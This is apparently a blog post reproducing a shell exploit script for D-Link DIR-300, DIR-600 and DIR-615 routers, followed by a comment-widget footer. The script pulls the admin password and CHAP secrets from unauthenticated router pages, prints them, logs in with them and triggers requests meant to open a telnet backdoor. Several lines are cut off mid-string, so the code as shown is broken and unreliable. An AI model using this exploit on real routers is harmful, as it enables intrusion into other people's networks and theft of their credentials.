General info:
=============
A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin.
===========
#!/bin/sh
if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;
if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi
UPORT=31337;
echo "Trying $1 ...";
HTTPASSWD=`curl -sS "http://$1/model/
if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;
echo "found username: $L";
echo "found password: $P";
curl -d "ACTION_POST=LOGIN&LOGIN_USER=
if [ $? -eq 0 ]; then
curl -sS "http://$1/
curl -sS "http://$1/
curl -sS "http://$1/
echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "http://$1/logout.php" 1>/dev/null;
fi
fi
CHAP=`curl -sS "http://$1/model/
if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;
-- cut
Credits:
========
echo $use_the_source_luke
Post a Comment
Blogger Facebook DisqusComment ေပးရန္ ညာဘက္ေထာင့္မွ Blogger or Facebook or Disqus ကုိႏွိပ္ပါ။